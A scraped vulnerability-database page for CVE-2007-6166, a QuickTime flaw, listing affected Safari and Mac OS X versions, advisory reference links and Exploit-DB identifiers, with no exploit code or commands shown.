Apple>>Safari >> Version 6.0 (Open CPE detail)
Apple>>Safari >> Version 6.0.1 (Open CPE detail)
Apple>>Safari >> Version 6.0.2 (Open CPE detail)
Apple>>Safari >> Version 6.0.3 (Open CPE detail)
Apple>>Safari >> Version 6.0.4 (Open CPE detail)
Apple>>Safari >> Version 6.0.5 (Open CPE detail)
Apple>>Safari >> Version 6.1 (Open CPE detail)
Apple>>Safari >> Version 6.1.1 (Open CPE detail)
Apple>>Safari >> Version 6.1.2 (Open CPE detail)
Apple>>Safari >> Version 6.1.3 (Open CPE detail)
Apple>>Safari >> Version 6.1.4 (Open CPE detail)
Apple>>Safari >> Version 6.1.5 (Open CPE detail)
Apple>>Safari >> Version 6.2.1 (Open CPE detail)
Apple>>Safari >> Version 6.2.4 (Open CPE detail)
Apple>>Safari >> Version 6.2.5 (Open CPE detail)
Apple>>Safari >> Version 6.2.6 (Open CPE detail)
Apple>>Safari >> Version 6.2.8 (Open CPE detail)
Apple>>Safari >> Version 7.0 (Open CPE detail)
Apple>>Safari >> Version 7.0.1 (Open CPE detail)
Apple>>Safari >> Version 7.0.2 (Open CPE detail)
Apple>>Safari >> Version 7.0.3 (Open CPE detail)
Apple>>Safari >> Version 7.0.4 (Open CPE detail)
Apple>>Safari >> Version 7.0.5 (Open CPE detail)
Apple>>Safari >> Version 7.1 (Open CPE detail)
Apple>>Safari >> Version 7.1.1 (Open CPE detail)
Apple>>Safari >> Version 7.1.4 (Open CPE detail)
Apple>>Safari >> Version 7.1.5 (Open CPE detail)
Apple>>Safari >> Version 7.1.6 (Open CPE detail)
Apple>>Safari >> Version 7.1.8 (Open CPE detail)
Apple>>Safari >> Version 8.0 (Open CPE detail)
Apple>>Safari >> Version 8.0.1 (Open CPE detail)
Apple>>Safari >> Version 8.0.4 (Open CPE detail)
Apple>>Safari >> Version 8.0.5 (Open CPE detail)
Apple>>Safari >> Version 8.0.6 (Open CPE detail)
Apple>>Safari >> Version 8.0.8 (Open CPE detail)
Apple>>Safari >> Version 9.0.1 (Open CPE detail)
Apple>>Safari >> Version 9.0.2 (Open CPE detail)
Apple>>Safari >> Version 9.0.3 (Open CPE detail)
Apple>>Safari >> Version 9.1 (Open CPE detail)
Apple>>Safari >> Version 9.1.1 (Open CPE detail)
Apple>>Safari >> Version 9.1.3 (Open CPE detail)
Apple>>Safari >> Version 10.0.0 (Open CPE detail)
Apple>>Safari >> Version 10.0.1 (Open CPE detail)
Apple>>Safari >> Version 10.0.2 (Open CPE detail)
Apple>>Safari >> Version 10.0.3 (Open CPE detail)
Apple>>Safari >> Version 10.1 (Open CPE detail)
Apple>>Safari >> Version 10.1.1 (Open CPE detail)
Apple>>Safari >> Version 10.1.2 (Open CPE detail)
Apple>>Safari >> Version 11.0 (Open CPE detail)
Apple>>Safari >> Version 11.0.1 (Open CPE detail)
Apple>>Safari >> Version 11.0.2 (Open CPE detail)
Apple>>Safari >> Version 11.0.3 (Open CPE detail)
Apple>>Safari >> Version 11.1 (Open CPE detail)
Apple>>Safari >> Version 11.1.1 (Open CPE detail)
Apple>>Safari >> Version 11.1.2 (Open CPE detail)
Apple>>Safari >> Version 12 (Open CPE detail)
Apple>>Safari >> Version 12.0 (Open CPE detail)
Apple>>Safari >> Version 12.0.1 (Open CPE detail)
Apple>>Safari >> Version 12.0.2 (Open CPE detail)
Apple>>Safari >> Version 12.0.3 (Open CPE detail)
Apple>>Safari >> Version 12.1 (Open CPE detail)
Apple>>Safari >> Version 12.1.1 (Open CPE detail)
Apple>>Safari >> Version 12.1.2 (Open CPE detail)
Apple>>Safari >> Version 13 (Open CPE detail)
Apple>>Safari >> Version 13.0.1 (Open CPE detail)
Apple>>Safari >> Version 13.0.3 (Open CPE detail)
Apple>>Safari >> Version 13.0.4 (Open CPE detail)
Apple>>Safari >> Version 13.0.5 (Open CPE detail)
Apple>>Safari >> Version 13.1 (Open CPE detail)
Apple>>Safari >> Version 13.1.1 (Open CPE detail)
Apple>>Safari >> Version 13.1.2 (Open CPE detail)
Apple>>Safari >> Version 14.0 (Open CPE detail)
Apple>>Safari >> Version 14.0.1 (Open CPE detail)
Apple>>Safari >> Version 14.0.2 (Open CPE detail)
Apple>>Safari >> Version 14.0.3 (Open CPE detail)
Apple>>Safari >> Version 14.1 (Open CPE detail)
Apple>>Safari >> Version 14.1.1 (Open CPE detail)
Apple>>Safari >> Version 14.1.2 (Open CPE detail)
Apple>>Safari >> Version 15.0.0 (Open CPE detail)
Apple>>Safari >> Version 15.4 (Open CPE detail)
Apple>>Safari >> Version 15.6 (Open CPE detail)
Apple>>Safari >> Version 15.6.1 (Open CPE detail)
Apple>>Safari >> Version 16.0 (Open CPE detail)
Apple>>Safari >> Version 16.1 (Open CPE detail)
Apple>>Safari >> Version 16.2 (Open CPE detail)
Apple>>Safari >> Version 16.3 (Open CPE detail)
Apple>>Safari >> Version 16.4 (Open CPE detail)
Apple>>Safari >> Version 16.4.1 (Open CPE detail)
Apple>>Safari >> Version 16.5 (Open CPE detail)
Apple>>Safari >> Version 16.5.1 (Open CPE detail)
Apple>>Safari >> Version 16.5.2 (Open CPE detail)
Apple>>Safari >> Version 16.6 (Open CPE detail)
Apple>>Safari >> Version 16.6.1 (Open CPE detail)
Apple>>Safari >> Version 17.0 (Open CPE detail)
Apple>>Safari >> Version 17.1 (Open CPE detail)
Apple>>Safari >> Version 17.1.2 (Open CPE detail)
Apple>>Safari >> Version 17.2 (Open CPE detail)
Apple>>Safari >> Version 17.3 (Open CPE detail)
Apple>>Safari >> Version 17.4 (Open CPE detail)
Apple>>Safari >> Version 17.4.1 (Open CPE detail)
Apple>>Safari >> Version 17.5 (Open CPE detail)
Apple>>Safari >> Version 17.6 (Open CPE detail)
Apple>>Safari >> Version 18 (Open CPE detail)
Apple>>Safari >> Version 18.0 (Open CPE detail)
Apple>>Safari >> Version 18.1 (Open CPE detail)
Apple>>Safari >> Version 18.1.1 (Open CPE detail)
Apple>>Safari >> Version 18.2 (Open CPE detail)
Apple>>Safari >> Version 18.3 (Open CPE detail)
Apple>>Safari >> Version 22 (Open CPE detail)
Apple>>Safari >> Version 46 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.3.9

Apple>>Mac_os_x >> Version 10.3.9 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.4.9

Apple>>Mac_os_x >> Version 10.4.9 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5

Apple>>Mac_os_x >> Version 10.5 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.0

Apple>>Mac_os_x >> Version 10.5.0 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.1

Apple>>Mac_os_x >> Version 10.5.1 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.2

Apple>>Mac_os_x >> Version 10.5.2 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.3

Apple>>Mac_os_x >> Version 10.5.3 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.4

Apple>>Mac_os_x >> Version 10.5.4 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.5

Apple>>Mac_os_x >> Version 10.5.5 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.6

Apple>>Mac_os_x >> Version 10.5.6 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.7

Apple>>Mac_os_x >> Version 10.5.7 (Open CPE detail)

Apple>>Mac_os_x >> Version 10.5.8

Apple>>Mac_os_x >> Version 10.5.8 (Open CPE detail)

References

http://www.securityfocus.com/bid/26549
Tags : vdb-entry, x_refsource_BID

http://www.beskerming.com/security/2007/11/25/74/QuickTime_-_Remote_hacker_automatic_control
Tags : x_refsource_MISC

http://securityreason.com/securityalert/3410
Tags : third-party-advisory, x_refsource_SREASON

https://www.exploit-db.com/exploits/4648
Tags : exploit, x_refsource_EXPLOIT-DB

http://docs.info.apple.com/article.html?artnum=307176
Tags : x_refsource_MISC

http://lists.apple.com/archives/Security-announce/2007/Dec/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE

http://security.gentoo.org/glsa/glsa-200803-08.xml
Tags : vendor-advisory, x_refsource_GENTOO

http://www.securityfocus.com/bid/26560
Tags : vdb-entry, x_refsource_BID

http://www.us-cert.gov/cas/techalerts/TA07-334A.html
Tags : third-party-advisory, x_refsource_CERT

http://www.kb.cert.org/vuls/id/659761
Tags : third-party-advisory, x_refsource_CERT-VN

https://exchange.xforce.ibmcloud.com/vulnerabilities/38604
Tags : vdb-entry, x_refsource_XF

https://www.exploit-db.com/exploits/6013
Tags : exploit, x_refsource_EXPLOIT-DB

http://www.vupen.com/english/advisories/2007/3984
Tags : vdb-entry, x_refsource_VUPEN

http://secunia.com/advisories/27755
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/29182
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.securitytracker.com/id?1018989
Tags : vdb-entry, x_refsource_SECTRACK

CVE-2007-6166 : Detail

CVE-2007-6166

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 4648

Exploit Database EDB-ID : 16873

Exploit Database EDB-ID : 6013

Exploit Database EDB-ID : 4657

Exploit Database EDB-ID : 4651

Exploit Database EDB-ID : 4664

Exploit Database EDB-ID : 11027

Exploit Database EDB-ID : 16424

Products Mentioned

Configuraton 0

Configuraton 0

References